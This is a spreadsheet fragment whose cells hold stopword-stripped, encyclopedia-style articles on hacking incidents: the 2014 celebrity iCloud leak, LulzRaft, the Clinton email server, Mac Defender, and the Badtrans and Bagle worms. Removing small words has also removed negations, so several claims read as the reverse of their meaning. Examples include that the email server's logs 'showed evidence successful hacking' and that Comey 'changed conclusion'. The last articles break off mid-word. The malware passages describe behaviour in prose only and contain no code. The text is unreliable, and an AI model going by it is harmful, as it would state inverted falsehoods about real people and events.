    <t>august 2014, collection nearly private pictures numerous celebrities, mostly women, many containing nudity, posted imageboard 4chan, soon disseminated users websites social networks imgur reddit. leak popularly dubbed fappening also celebgate. images initially believed obtained breach apple's cloud services suite icloud, security issue icloud allowed make unlimited attempts guessing victims' passwords. apple claimed press release access gained spear phishing attacks.the incident varied reactions media fellow celebrities. critics felt distribution photos major invasion privacy subjects, alleged subjects denied images' authenticity. leak also prompted increased concern analysts surrounding privacy security cloud computing services icloud—with particular emphasis store sensitive, private information. etymology "the fappening" jocular portmanteau coined combining words "fap", internet slang term masturbation, title 2008 film happening. though term vulgarism originating either imageboards pictures initially posted reddit, mainstream media outlets soon adopted term themselves, bbc. term received criticism journalists like radhika sanghani daily telegraph toyin owoseje international business times, said term trivialized leak, also, according sanghani, "[made] light severe situation." both articles used term extensively describe event, including headlines."celebgate" reference watergate scandal. procurement distribution images obtained online storage offered apple's icloud platform automatically backing photos devices, iphones. apple later reported victims' icloud account information obtained using targeted attack user names, passwords security questions", phishing brute-force attack guessing. initially believed images obtained using exploit find iphone service. court documents 2014 indicated user created fake email account called "appleprivacysecurity" celebrities security information. photos passed around privately least couple weeks public release august there claims unreleased photos videos exist.the hacker responsible leak, described "collector", distributed leaked images image boards 4chan anon-ib exchange bitcoin. ultimately, images widely circulated online channels, including imgur tumblr. celebrity gossip blogger perez hilton also re-posted photos blog, soon took issued apology, saying acted taste".a major center activity link-sharing website reddit, subreddit, /r/thefappening, created sharing photos; single day, amassed 100,000 followers. reddit administrators criticized allowing take place alleged violation anti-doxing rules. mckayla maroney claimed time photos taken, reddit staff took photos warned anyone re-posting them, underage photos circulating prior incident, would permanently banned site could prosecuted distributing child pornography. september citing copyright issues, reddit banned /r/thefappening, also saying workload dealing become much. reddit banned another subreddit named "fappening" day. content affected celebrities original release contained photos videos individuals allegedly obtained file storage hacked icloud accounts, including leakers claimed a-list celebrities. shortly photos leaked, several affected celebrities issued statements either confirming denying photos' authenticity. celebrities confirmed photos' authenticity include jennifer lawrence (confirmed publicist), kate upton husband justin verlander (confirmed upton's lawyer), mary elizabeth winstead (confirmed twitter), jessica brown findlay (confirmed spokesman), kaley cuoco (confirmed instagram), kirsten dunst, also criticized icloud service. jill scott confirmed twitter leaked photos stating another fake.celebrities denied photos' authenticity include ariana grande yvonne strahovski. olympic gymnast mckayla maroney initially denied images' authenticity twitter, later confirmed photos legitimate also saying underage taken. victoria justice denied photos authentic later stated twitter pursuing legal action found leak massive invasion privacy, privacy celebrities affected incident. reports october indicated nick hogan first male star directly targeted hackers; however, hogan denied pictures' authenticity.according security expert cubrilovic, addition photographs, personal information text messages, calendars, address books, phone call logs data stored phones backed service also likely stolen.on september 2014, second batch similar private photos additional celebrities leaked hackers. september 2014, third batch also leaked, dubbed "the fappening reactions actress lena dunham pleaded twitter people view photos, arguing "you violating women again. it's okay." actress emma watson condemned leak, also "the accompanying comments social media] show lack empathy." actors seth rogen lucas neff also spoke hackers people posted pictures. justin verlander, pitcher detroit tigers, told media prior game cleveland indians keeps private life private would rather focus tigers' race kansas city royals central title distraction teammates. security analysts stated breach could prevented two-factor authentication, forbes writer recommended completely shutting icloud "photo stream" feature (which automatically uploads photos taken device icloud servers). interview wall street journal, apple cook stated response leak, company planned take additional steps protect privacy security icloud users future. notifications provided whenever data restored device icloud logging icloud browser, addition existing notifications user's icloud password changed. additionally, apple broaden encourage two-factor authentication future versions software operating systems, then-upcoming conclusion, emphasized want everything protect customers, outraged are."jennifer lawrence contacted authorities publicist stated authorities would prosecute anyone posted leaked images her. forbes columnist joseph steinberg questioned whether reactions enforcement technology providers indicated celebrities treated differently ordinary americans, which, case enforcement, illegal.on october 2014, google threatened $100 million lawsuit lawyer martin singer behalf unnamed victims leak, alleging google refused respond requests images removed platforms (including blogger youtube), "[failing] expeditiously, responsibly remove images", "knowingly accommodating, facilitating, perpetuating unlawful conduct".in interview vanity fair, victim jennifer lawrence called hack "sex crime" "sexual violation"; added, "anybody looked pictures, perpetuating sexual offense. cower shame." this view contrasted another victim hack, emily ratajkowski, told people victims [the hack] said anyone looks pictures feel guilty, think that's fair", "i'm sure anyone googles necessarily criminal. think people stole photos are". investigation said "aware allegations concerning computer intrusions unlawful release material involving high profile individuals, addressing matter." similarly, apple stated investigating whether security breach icloud service responsible leaked photographs, company's commitment user privacy. september 2014, apple reported leaked images result compromised accounts, using targeted attack user names, passwords security questions, practice become common internet".in october 2014, searched house chicago, illinois seized several computers, cellphones storage drives tracking source hacking attack address linked individual named emilio herrera. related search warrant application mentioned eight unidentified high profile victims. according enforcement officials, herrera several people investigation carried various searches across country. guilty pleas march 2016, 36-year-old ryan collins lancaster, pennsylvania, agreed plead guilty count unauthorized access protected computer obtain information resulting 18-month sentence. while victims named court documents, numerous media outlets connected collins' case breach. during investigation, found collins phished sending e-mails victims looked like sent apple google, warning victims accounts might compromised asking account details. victims would enter passwords, collins gained access accounts, downloading e-mails icloud backups. october 2016, collins sentenced months prison.in august 2016, 28-year-old edward majerczyk chicago, agreed plead guilty similar phishing scheme, although authorities believe worked independently accused selling images posting online. january 2017, majerczyk sentenced nine months prison ordered $5,700 restitution cover counseling services unnamed celebrity victim.emilio herrera, also chicago, first named press 2014; pleaded guilty count unauthorized access protected computer obtain information october 2017. herrera accessed accounts unnamed celebrities others accused involved leaking sharing photos videos obtained. sentenced months jail march 2018.in april 2018, 26-year-old george garofano north branford, connecticut, pleaded guilty count unauthorized access protected computer obtain information. garofano's attorney said phishing scheme criminals. august 2018, federal court sentenced garofano eight months prison.on october 2018, christopher brannan, former virginia teacher, became fifth convicted relation hacking. brannan pled guilty federal charges aggravated identity theft unauthorized access protected computer. through phishing expedition, hacked people. addition celebrity victims, brannan targeted underage sister-in-law, well teachers students school used teach. brannan sentenced months prison march 2019. also criticism apple inc. edison chen photo scandal imagery nude celebrities list "-gate" scandals controversies sexting references external links hacked celebrity icloud accounts technical analysis security breach full list celebrities allegedly affected nude photo leak variety latino (archived august 2017, wayback machine)</t>
  </si>
  <si>
    <t>LulzRaft</t>
  </si>
  <si>
    <t>lulzraft name computer hacker group individual gained international attention 2011 series high-profile attacks canadian websites. their targets included conservative party canada husky energy. june 2011, lulzraft claimed responsibility hacking conservative party canada website posting false story canadian prime minister stephen harper. hackers posted alert site claiming harper choked hash brown eating breakfast airlifted toronto general hospital. story fooled many, including canadian christopher alexander, spread story twitter. spokesman prime minister soon denied story.lulzraft targeted conservative party june taking responsibility successful breach database containing information party's donors. information accessed group including names donors well home e-mail addresses. lulzraft later stated party "terrible security" intrusion used basic methods. lulzraft also apparently hacked website husky energy day. they inserted notice promising free users used coupon code "hash-browns", claiming gesture goodwill intended placate conservatives offended previous attacks.though commentators speculated group motivated dislike conservative party, lulzraft stated non-partisan group general dislike politicians. unknown whether group linked lulzsec, although media reports included speculation lulzraft's attacks inspired copycat effect. also internet portal references external links lulzraft twitter</t>
  </si>
  <si>
    <t>Potential hack of Hillary Clinton's private email server</t>
  </si>
  <si>
    <t>during tenure united states secretary state, hillary clinton drew controversy using private email server official public communications rather using official state department email accounts maintained federal servers. clinton's server found hold emails containing classified information, including emails deemed "secret" deemed "top secret". additional 2,093 emails marked classified retroactively designated confidential state department.some experts, officials, members congress contended clinton's private messaging system private server violated federal law, specifically u.s. code 1924, regarding unauthorized removal retention classified documents materials, well state department protocols procedures, regulations governing recordkeeping. clinton claimed complied federal laws state department regulations, former secretaries state also maintained personal email accounts (however clinton secretary state private server). news reports indicated emails discussed "innocuous" matters already available public domain. example, drone program widely discussed public domain since early 2000s; however, existence program technically classified, sharing newspaper article mentions would constitute security breach, according cia.the controversy major point discussion contention 2016 presidential election, clinton democratic nominee. may, state department's office inspector general released report state department's email practices, including clinton's. july, director james comey announced investigation concluded clinton "extremely careless" recommended charges filed clinton criminal intent, historical standard pursuing prosecution.on october 2016, eleven days election, comey notified congress started looking newly discovered emails. november comey notified congress changed conclusion. comey's timing contentious, critics saying violated department justice guidelines precedent, prejudiced public clinton. controversy received media coverage topic presidential campaign. clinton observers argue reopening investigation contributed loss election. comey said 2018 book higher loyalty decision unconsciously influenced fact considered extremely likely clinton would become next president.on june 2018, department justice's office inspector general released report fbi's doj's handling clinton's investigation, finding evidence political bias lending support decision prosecute clinton. three-year state department investigation concluded september 2019 individuals "culpable" instances sending classified information reached clinton's email account, though found persuasive evidence systemic, deliberate mishandling classified information". background clinton's blackberrys prior appointment secretary state 2009, clinton circle friends colleagues communicated blackberry phones. state department security personnel suggested would pose security risk tenure. email account used clinton's blackberry hosted private server basement home chappaqua, york, information disclosed state department security personnel senior state department personnel.setting secure desktop computer office suggested, clinton unfamiliar opted convenience blackberry, state department government protocol secured desktop computer. efforts find secure solution abandoned clinton, warned state department security personnel vulnerability unsecured blackberry hacking. affirmed knowledge danger, reportedly told bureau diplomatic security obtained intelligence vulnerability trip asia, continued blackberry outside office. domain names email server time senate confirmation hearings hillary clinton's nomination secretary state, domain names clintonemail.com, wjcoffice.com, presidentclinton.com registered eric hoteham, home clinton husband chappaqua, york, contact address. domains pointed private email server clinton (who never state.gov email account) used send receive email, purchased installed clintons' home 2008 presidential campaign.the email server located clintons' home chappaqua, york, january 2009 2013, sent data center jersey handed platte river networks, denver-based information technology firm clinton hired manage email system.the server runs microsoft exchange 2010 server access emails internet delivered outlook app. page secured certificate allow information transmitted securely using website. however, first months january 2009 march 2009 page reportedly secured certificate, meaning information transmitted using service unencrypted vulnerable interception. initial awareness early 2009, officials national archives records administration (nara) expressed concerns possible violations normal federal government record-keeping procedures state department then-secretary clinton.in december 2012, near clinton's tenure secretary state, nonprofit group called citizens responsibility ethics washington, crew, filed foia request seeking records email. crew received response 2013: records responsive request located." emails sent clinton's private clintonemail.com address first discovered march 2013, hacker named "guccifer" widely distributed emails sent clinton sidney blumenthal, guccifer obtained illegally accessing blumenthal's email account. emails dealt 2012 benghazi attack issues libya revealed existence clintonemail.com address.blumenthal security clearance received material clinton since characterized classified state department.in summer 2014, lawyers state department noticed number emails clinton's personal account, reviewing documents requested house select committee benghazi. request state department additional emails negotiations lawyers advisors. october, state department sent letters clinton previous secretaries state back madeleine albright requesting emails documents related work office. december 2014, clinton lawyers delivered file boxes filled printed paper containing 30,000 emails. clinton withheld almost 32,000 emails deemed personal nature. datto, inc., provided data backup service clinton's email, agreed give hardware stored backups.as 2016, answer provided public whether 31,000 emails deleted hillary clinton personal could recovered.a march 2015 york times article broke story benghazi panel discovered clinton exclusively used private email server rather government-issued throughout time secretary state, aides took action preserve emails sent received personal accounts required law. point, clinton announced asked state department release emails. some media labeled controversy "emailgate." private server government business according clinton's spokesperson nick merrill, number government officials used private email accounts official business, including secretaries state clinton, none private domain house private email account.state department spokesperson marie harf said that: "for historical context, secretary kerry first secretary state rely primarily state.gov email account." john wonderlich, transparency advocate sunlight foundation, observed many government officials used private email accounts, private email servers much rarer. notable exception bush administration, dozens senior white house officials conducted government business approximately million emails using accounts server owned republican national committee.dan metcalfe, former head justice department's office information privacy, said gave even tighter control emails involving third party google helped prevent disclosure congressional subpoena. added: "she managed successfully insulate official emails, categorically, foia, tenure state long departure it—perhaps forever," making blatant circumvention foia someone unquestionably knows better."according harf, government officials personal email government business permissible federal records act, long relevant official communications, including work-related emails, preserved agency. (which amended late 2014 clinton left office require personal emails transferred government servers within days) requires agencies retain official communications, including work-related emails, stipulates government employees cannot destroy remove relevant records. nara regulations dictate records created maintained, require must maintained agency" "readily found," records must "make possible proper scrutiny congress." section 1924 title united states code addresses deletion retention classified documents, "knowingly" removing housing classified information "unauthorized location" subject fine, year prison.experts metcalfe agree practices allowed federal assuming material supposed classified, least practices allowed case emergencies, discourage practices, believing official email accounts used.jason baron, former head litigation nara, described practice "highly unusual" violation law. separate interview, said, difficult conceive scenario—short nuclear winter—where agency would justified allowing cabinet-level head officer solely private email communications channel conduct government business." baron told senate judiciary committee 2015 "any employee's decision conduct email correspondence private email network, using non-.gov address, inconsistent long-established policies practices federal records nara regulations governing federal agencies." 2016 report state department's inspector general 2016, department's office inspector general steve linick released 83-page report state department's email practices. inspector general unable find evidence clinton ever sought approval state department staff private email server, determining clinton sought approval, department staff would declined setup "security risks so." aside security risks, report stated "she comply department's policies implemented accordance federal records act." each findings contradicted clinton aides saying point. report also stated clinton senior aides declined speak investigators, previous four secretaries state so.the report also reviewed practices several previous secretaries state concluded department's record keeping practices subpar many years. inspector general criticized clinton's private email department business, concluding "not appropriate method" document preservation follow department policies comply federal record laws. report also criticized colin powell, used personal email account business, saying violated department policies. state department spokesman mark toner said report emphasized need federal agencies adapt "decades-old record-keeping practices email-dominated modern era" said department's record-retention practices improved current secretary state john kerry, clinton's successor. report also notes rules preserving work-related emails updated 2009.inspector general linick wrote "found evidence staff office legal adviser reviewed approved secretary clinton's personal system," also found multiple state employees raised concerns regarding clinton's server told office legal adviser approved told "never speak secretary's personal email system again."clinton campaign spokesman brian fallon issued statement saying: "the report shows problems state department's electronic record-keeping systems long-standing" clinton "took steps went much others appropriately preserve release records." however, associated press said, "the audit note former secretary state colin powell also exclusively used private email account. failings clinton singled audit serious predecessor." report stated secretary clinton's tenure, department's guidance considerably detailed sophisticated, secretary clinton's cybersecurity practices accordingly must evaluated light comprehensive directives." server security hacking attempts encryption security 2008, hillary clinton became secretary state, justin cooper, longtime aide clinton's husband, former president bill clinton, managed system. cooper security clearance expertise computer security. later, bryan pagliano, former director clinton's 2008 presidential campaign, hired maintain private email server clinton secretary state. pagliano invoked fifth amendment congressional questioning clinton's server. early 2016, granted immunity department justice exchange cooperation prosecutors. clinton spokesman said campaign "pleased" pagliano cooperating prosecutors. 2016, state department remained unable locate pagliano's work-related emails period employed department secretary clinton.security experts chris soghoian believe emails clinton risk hacking foreign surveillance. marc maiffret, cybersecurity expert, said server "amateur hour" vulnerabilities. first months clinton appointed secretary state began accessing mail server blackberry, transmissions server apparently encrypted. march 2009, digital certificate obtained would permitted encryption.former director defense intelligence agency michael flynn, former united states secretary defense robert gates, former deputy director central intelligence agency michael morell said likely foreign governments able access information clinton's server. michael hayden, former director national security agency, principal deputy director national intelligence, director central intelligence agency said would lose respect whole bunch foreign intelligence agencies sitting back, paging emails." hacking attempts clinton's server configured allow users connect openly internet control remotely using microsoft's remote desktop services.it known hackers aware clinton's non-public email address early 2011. secretary clinton staff aware hacking attempts 2011, reportedly worried them.in 2012, according server records, hacker serbia scanned clinton's chappaqua server least twice, august december 2012. unclear whether hacker knew server belonged clinton, although identify providing email services clintonemail.com. during 2014, clinton's server target repeated intrusions originating germany, china, south korea. threat monitoring software server blocked least five attempts. software installed october 2013, three months prior that, software installed.according pagliano, security logs clinton's email server showed evidence successful hacking. york times reported "forensic experts sometimes spot sophisticated hacking apparent logs, computer security experts view logs documents detecting hackers," adding logs "bolster mrs. clinton's assertion personal email account american secrets hands hackers foreign governments."in 2013, romanian hacker marcel lehel lazăr (aka "guccifer") distributed private memos sidney blumenthal clinton events libya acquired hacking blumenthal's email account. 2016, lazăr extradited romania u.s. face unrelated federal charges related hacking accounts number high-profile u.s. figures, pleading guilty charges. while detained pending trial, lazăr claimed media successfully hacked clinton's server, provided proof claim. officials associated investigation told media found evidence supporting lazăr's assertion, clinton press secretary brian fallon said "there absolutely basis believe claims made criminal prison cell." director james comey later stated congressional hearing guccifer admitted claim lie.according security researchers secureworks email leak caused threat group-4127, later attributed fancy bear, unit targets governments, military, international non-governmental organizations. researchers report moderate confidence unit gathers intelligence behalf russian government. deletion emails 2014, months prior public knowledge server's existence, clinton chief staff cheryl mills attorneys worked identify work-related emails server archived preserved state department. upon completion task december 2014, mills instructed clinton's computer services provider, platte river networks (prn), change server's retention period days, allowing 31,830 older personal emails automatically deleted server, clinton decided longer needed them. however, technician assigned task failed carry time.after existence server became publicly known march 2015, select committee benghazi issued subpoena benghazi-related emails days later. mills sent email march mentioning committee's retention request. technician described shit moment," realizing personal emails deleted instructed months earlier. technician erased emails using free utility, bleachbit, sometime march bloomberg news reported september 2015 recovered deleted emails.since episode, clinton critics accused aides deleting emails subpoena, alleging server "bleached" "acid-washed" "very expensive" process effort destroy evidence, candidate donald trump stating 2016 election "hillary clinton erased 30,000 emails part cover-up." trump reiterated position late august 2018, asking "look crimes clinton emails deletes 33,000 emails gets subpoena congress, justice department nothing it?" classified information emails various interviews, clinton said send classified material, receive material marked designated classified." however, june july 2016, number news outlets reported clinton's emails include messages paragraphs marked "(c)" "confidential." investigation found messages contained information classified time sent. sixty-five emails found contain information classified "secret;" contained "top-secret" information. three emails, 30,000, found marked classified, although lacked classified headers marked small parentheses, described "portion markings" comey. added possible clinton "technically sophisticated" enough understand three classified markings meant consistent clinton's claim aware meaning markings.clinton personally wrote 2,093 emails retroactively found contain information classified "confidential." remaining emails classified sent, clinton aide jake sullivan wrote most, 215.according state department, 2,093 email chains server retroactively marked classified state department "confidential," "secret," "top secret."an interagency dispute arose investigation constitutes “classified” status information acquired considered “owned” intelligence agencies also independently publicly available “parallel reporting” press others. reported instance, email chain deemed intelligence community contain classified information included discussion york times article reported drone strike pakistan; despite wide public knowledge drone program, "owning agency" considers existence drone program classified entirety. assistant secretary state legislative affairs julia frifield noted, "when policy officials obtain information open sources, ‘think tanks,’ experts, foreign government officials, others, fact information also available intelligence channels mean information necessarily classified.” state department inspector general reports statements june 2015, memorandum inspector general state department, steve linick, said review 55,000-page email release found "hundreds potentially classified emails." july 2015, follow-up memo, sent jointly linick intelligence community (ic) inspector general, charles mccullough iii, under secretary state management patrick kennedy, stated confirmed several emails contained classified information marked classified, least publicly released.on july 2015, linick mccullough said discovered classified information clinton's email account, whether clinton sent received emails. investigators office, searching randomly chosen sample emails, found four contained classified information originated u.s. intelligence agencies, including central intelligence agency (cia) national security agency (nsa). their statement said information found classified sent, remained inspection, "never transmitted unclassified personal system."in separate statement form letter congress, mccullough said made request state department access entire emails turned clinton, department rejected request. letter stated none emails marked classified, included classified information marked handled such, transmitted securely.on august 2015, inspector general said emails sample "top secret/sensitive compartmented information" subsequently given classified labels "tk" (for "talent keyhole," indicating material obtained aerial space-based imagery sources noforn). discussion news article u.s. drone strike operation. second, said, either referred classified material else "parallel reporting" open-source intelligence, might still classified government "owning agency" sourced information secret means even though information also available public domain. clinton's presidential campaign state department disputed letter, questioned whether emails over-classified arbitrary process. according unnamed source, secondary review national geospatial-intelligence agency endorsed earlier inspectors general findings concluding emails (one concerned north korea's nuclear weapons program) "top secret" received clinton private server 2009 2011, conclusion also disputed clinton campaign.the inspector general issued another letter congress january 2016. letter stated unnamed intelligence agency made sworn declaration "several dozen emails [had been] determined element confidential, secret, secret/sap levels." other intelligence officials added several dozen emails previous sample clearance inspector general upgraded could learn programs referenced emails. news reported january 2016, senior american officials described emails "innocuous" because—although discussed drone program technically classified secret/sap—the existence drone program widely known discussed public domain years. these officials characterized inspector general unfair handled issue.on january 2016, state department announced documents clinton's email server would released contained highly classified information sensitive public consumption. time, state department announced initiating investigation whether server contained information classified time sent received.in february 2016, state department linick addressed another report under secretary state kennedy, stating office also found classified material emails personal email accounts members former secretary condoleezza rice's staff emails personal email account former secretary state colin powell. none emails classified intelligence reasons. politifact found year earlier powell former secretary state personal email account. february 2016, clinton's campaign chairman issued statement claiming emails, like predecessors,' "being inappropriately subjected over-classification." investigation july 2015 security referral state department intelligence community (ic) inspector generals' discovery four emails containing classified information, random sample prompted make security referral fbi's counterintelligence office, alert authorities classified information kept clinton's server lawyer thumb drive. part fbi's midyear investigation, request inspector general, clinton agreed turn email server u.s. department justice, well thumb drives containing copies work-related emails. other emails obtained united states house select committee benghazi sources, connection committee's inquiry. clinton's emails made public stages state department gradual schedule.the york times front-page story july 2015, headline "criminal inquiry sought clinton's email," lead sentence stating, "two inspectors general asked justice department open criminal investigation whether hillary rodham clinton mishandled sensitive government information private email account used secretary state, senior government officials said thursday." shortly publication story, inspectors general intelligence community department state issued statement clarifying, important distinction make criminal referral security referral made counterintelligence purposes." times later made corrections, first clinton specific target referral, later referral "criminal" nature.clinton's contractors turned personal email server august 2015, well thumb drives containing copies emails.in letter describing matter senator johnson, chairman senate homeland security committee, clinton's lawyer david kendall said emails, data stored server, earlier erased prior device turned authorities, another lawyer given security clearances state department handle thumb drives containing 30,000 emails clinton subsequently also turned authorities. kendall said thumb drives stored safe provided july state department. august 2015 investigation continues; email recovery august 2015, u.s. district judge emmet sullivan stated hillary clinton's actions maintaining private email server direct conflict u.s. government policy. today employee followed government policy," said, ordered state department work determine emails server tenure secretary state could recovered.platte river networks, denver-based firm managed clinton server since 2013, said knowledge server wiped. "platte river knowledge server wiped," company spokesman andy boian told washington post. "all information server wiped." when asked washington post, clinton campaign declined comment.in september 2015, investigators engaged sorting messages recovered server. november 2015, expanded inquiry examine whether clinton aides jeopardized national security secrets, held responsible.conflicting media sources sized investigation agents march 2016. may–july 2016 public statements 2016, director james comey said "not familiar term 'security inquiry'" clinton campaign characterizing probe, adding word investigation name" "we're conducting investigation that's that's probably it." comey noted 2018 memoir publicly contradict clinton's characterization investigation "security inquiry" underway despite directly prompted reporter 2016. april 2017 became known had, fact, opened criminal investigation july 2015, telling york times received "criminal referral," although following issued public statement: "the department received referral related potential compromise classified information. criminal referral."in late june 2016, reported bill clinton privately attorney general loretta lynch private plane tarmac phoenix harbor international airport. officials indicated minute meeting took place clinton became aware lynch's plane tarmac airport. when meeting became public, lynch stated "primarily social" "there discussion matter pending department matter pending body." lynch criticized involvement meeting called critics recuse involvement fbi's investigation email case. response, stated "the f.b.i. investigating whether mrs. clinton, aides anyone else broke setting private email server secretary state," "the case resolved team working beginning" accepting recommendations."on july 2016, york times reported name "justice department official" attorney general loretta lynch accept "whatever recommendation career prosecutors f.b.i. director make whether bring charges related hillary clinton's personal email server."clinton maintained send receive confidential emails personal server. democratic debate bernie sanders february 2016, clinton said, never sent received classified material." meet press interview july 2016, stated: "let repeat repeated many months now, never received sent material marked classified." july 2016 investigation concludes perjury referral july 2016, director comey announced statement read press television reporters headquarters washington, completed investigation referring justice department recommendation "that charges appropriate case." added, "although evidence potential violations statutes regarding handling classified information, judgment reasonable prosecutor would bring case."with regard mishandling classified information, comey said, "there evidence [clinton team] extremely careless handling sensitive, highly classified information." investigation found emails regarded classified time sent; another 2,000 emails retroactively classified means classified time sent. comey said "any reasonable person secretary clinton's position, position government employees corresponding known unclassified system place conversation."the learned clinton used personal email extensively outside united states, sending receiving work-related emails territory sophisticated adversaries. find "direct evidence secretary clinton's personal e-mail domain successfully hacked;" assessed "possible hostile actors gained access" investigators found state department employees often used private emails conduct business. comey noted, also developed evidence security culture state department general, respect unclassified e-mail systems particular, generally lacking kind care classified information found elsewhere government."on july 2016, lynch confirmed investigation hillary clinton's private email servers secretary state would closed without criminal charges.on july 2016, jason chaffetz chairman goodlatte referred clinton u.s. attorney district columbia investigate whether clinton lied congress private email server.the york times reported april 2017 investigation provided documents acquired dutch intelligence hackers previously stolen russian intelligence. classified documents purported written democratic operative asserted lynch would allow clinton investigation far, though clear writer actually insight lynch's thinking. times reported documents raised concerns comey lynch announced closure investigation, russia subsequently released document, would cause suspect political interference. this reportedly comey, longtime republican, decide announce closure himself, though obama justice department skeptical account. june 2021 became known trump justice department acquired court order phone logs four times reporters written article together, part leak investigation. october 2016 additional investigation early october 2016, criminal investigators working case involving former congressman anthony weiner sending sexually explicit texts fifteen-year-old girl discovered emails weiner's estranged wife, huma abedin, vice chair hillary clinton's 2016 presidential campaign, considered potentially relevant clinton server investigation. officials reportedly decided disclose development despite potential effect pending presidential election preempt possibility would leaked another way.on october 2016, comey informed congress connection unrelated case, learned existence emails appear pertinent investigation." said take "appropriate investigative steps designed allow investigators review emails determine whether contain classified information, well assess importance investigation." added "cannot assess whether material significant." obtained search warrant allow review abedin's emails.comey informed congress additional investigation despite advised justice department officials announcement would violate department policies procedures, including policy comment investigations close election. comey later explained, letter employees, ordinarily tell congress ongoing investigations, feel obligation given testified repeatedly recent months investigation completed." enforcement sources added feared would accused concealing relevant information disclose it.news renewed investigation revealed shortly u.s. presidential election announcement described "october surprise," prompted statements democratic republican campaigns. donald trump repeated characterization hillary clinton's email usage secretary state "worse watergate." clinton called immediately release information newly discovered emails said confident would change earlier conclusion basis criminal prosecution. senator dianne feinstein (d-ca) said "shocked" letter, saying "played right political campaign donald trump."on november another letter congress, comey stated that, working "around clock" review newly discovered emails, changed conclusion reached july. unnamed government official added newly discovered emails turned either personal duplicates emails previously reviewed, comey's letter represents conclusion investigation. following day, stock currency markets around world surged response.on november conference call donors, hillary clinton attributed presidential election loss comey's announcements, saying stopped momentum. january 2017, justice department started investigation comey's announcements. 2019 study found comey's letter substantially increased trump's probability winning 2016 election. senate probes loretta lynch interference according comey's june 2017, testimony senate intelligence committee, then-attorney general loretta lynch asked downplay investigation clinton's emails calling "matter" rather investigation. said request "confused concerned" him. added lynch's tarmac meeting bill clinton also influenced decision publicly announce results probe.on june 2017, several members senate judiciary committee opened bipartisan inquiry whether former attorney general lynch interfered fbi's investigation hillary clinton's private email server. internal state department investigation july 2016, state department resumed review whether classified information mishandled. review suspended completion justice department investigation. united states department state finished investigation september 2019, citing security violat</t>
  </si>
  <si>
    <t>Mac Defender</t>
  </si>
  <si>
    <t>defender (also known protector, security, guard, shield, fakemacdef) internet rogue security program targets computers running macos. security firm intego discovered fake antivirus software 2011, patch provided apple may. software described first major malware threat macintosh platform (although attach damage part however, first mac-specific trojan, self-propagating. variant program, known guard, reported require user enter password install program, although still installer. symptoms users typically encounter program opening image found search engine. appears pop-up indicating viruses detected users' computer suggests download program which, installed, provides users' personal information unauthorized third parties. program appears malicious links spread search engine optimization poisoning sites google image search. when user accesses malicious link, fake scanning window appears, originally style windows application, later form "apple-type interface". program falsely appears scan system's hard drive. user prompted download file installs defender, asked us$59.95 us$79.95 license software. rather protect viruses, defender hijacks user's internet browser display sites related pornography, also exposes user identity theft passing credit card information cracker). newer variant installs without needing user enter password. variants require user actively click installer complete installation even password required. origin software traced german websites, closed down, russian online payment chronopay. defender traced chronopay email address chronopay financial controller alexandra volkova. email address appeared domain registration mac-defence.com macbookprotection.com, sites users directed order purchase security software. chronopay russia's largest online payment processor. sites hosted germany suspended czech registrar webpoint.name. chronopay earlier linked another scam users involved file sharing asked fine. apple response according sophos, may, 2011, sixty thousand calls applecare technical support defender-related issues, bott zdnet reported number calls applecare increased volume defender majority calls time pertained defender. applecare employees told assist callers removing software. specifically, support employees told instruct callers force quit activity monitor stop defender, well direct callers discussions pertaining problems caused defender. anonymous applecare support employee said apple instituted policy order prevent users relying technical support instead anti-virus programs.applecare employees told assist callers removing software, apple later promised software patch. 2011 apple issued instructions prevention removal malware. security update 2011-003 released 2011, includes automatic removal trojan, security updates, feature automatically updates malware definitions apple. also leap (computer worm) fakeflash references</t>
  </si>
  <si>
    <t>Badtrans</t>
  </si>
  <si>
    <t>badtrans malicious microsoft windows computer worm distributed e-mail. because known vulnerability older versions internet explorer, email programs, microsoft's outlook express microsoft outlook programs, install execute worm soon e-mail message viewed. once executed, worm replicates sending copies e-mail addresses found host's machine, installs keystroke logger, captures everything typed affected computer. badtrans transmits data several e-mail addresses.among e-mail addresses received keyloggers free addresses excite, yahoo, ijustgotfired.com. target address ijustgotfired began receiving emails 3:23pm november 2001. once account exceeded quotas, automatically disabled, messages still saved arrived. address received 100,000 keylogs first alone.in mid-december, contacted rudy rucker, jr., owner monkeybrains, requested copy keylogged data. data stolen victims worm; includes information creator badtrans. instead complying request, monkeybrains published database website, https://web.archive.org/web/20070621140432/https://badtrans.monkeybrains.net/ public determine given address compromised. database reveal actual passwords keylogged data. references</t>
  </si>
  <si>
    <t>Bagle (computer worm)</t>
  </si>
  <si>
    <t>bagle (also known beagle) mass-mailing computer worm affecting microsoft windows. first strain, bagle.a, propagate widely. second variant, bagle.b, considerably virulent. overview bagle used smtp engine mass-mail attachment recipients gathered infected computer combing computer’s .htm, .html, .txt, .wab files email addresses. mail addresses containing certain strings "@hotmail.com", "@msn.com", "@microsoft", "@avp", “.r1”. bagle pretends different file type 15,872 byte windows calculator bagle.a 11,264 byte audio file bagle.b), randomized name, open file type cover opening .exe file. copies windows system directory (bagle.a bbeagle.exe, bagle.b au.exe), adds hkcu keys registry, opens backdoor port (6777 bagle.a 8866 bagle.b). using http request, bagle.b also informs virus’s programmer machine successfully infected. bagel variants, including bagle.a bagle.b, generally date stop spreading including programming. computers infected older versions bagle updated newer ones released. history initial strain, bagle.a, first sighted january 2004, seemingly originating australia. original file name bagle virus beagle, computer scientists decided call bagle instead spite bagle’s programmer. although started strong 120,000 infected computers, quickly dwindled efficacy. sometimes accompanied trojan.mitglieder.c, stopped spreading january 2004, designed.the second strain, bagle.b, first sighted february 2004. much widespread appeared large numbers; network associates rated "medium" threat. designed stop spreading february 2004. point 2004, bagle netsky viruses exchanged insults harsh words codes, beginning bagle.i march 2004. notably, bagle.j contained message “hey, netsky, fuck bitch, ruine bussiness, wanna start war?”, netsky-r included, "yes, true, understand bagle shitty guy, opens backdoor makes money. netsky not, netsky skynet, good software, good guys behind believe not. release thousands skynet versions, long bagle ...". additionally, bagle netsky tried remove infected system.subsequent variants later discovered. july 2004, variants bagle, april 2005, number increased 100. although successful, number remain notable threats. additionally, july 2004, bagle.ad bagle.ae released, source code virus, written assembly, visibly appearing them.some variants contain following text: "greetz antivirus companies difficult world, nameless time, want survive, mine!! bagle author, 29.04.04, germany." this people think worm originated germany. since 2004, threat risk variants changed "low" decreased prevalence. however, windows users warned watch botnet bagle botnet (initial discovery early 2004), also known aliases beagle, mitglieder lodeight, botnet mostly involved proxy-to-relay e-mail spam. bagle botnet consists estimated 150,000-230,000 computers infected bagle computer worm. estimated botnet responsible 10.39% worldwide spam volume december 2009, surge year's day, though actual percentage seems rise drop rapidly. april 2010 estimated botnet sends roughly billion 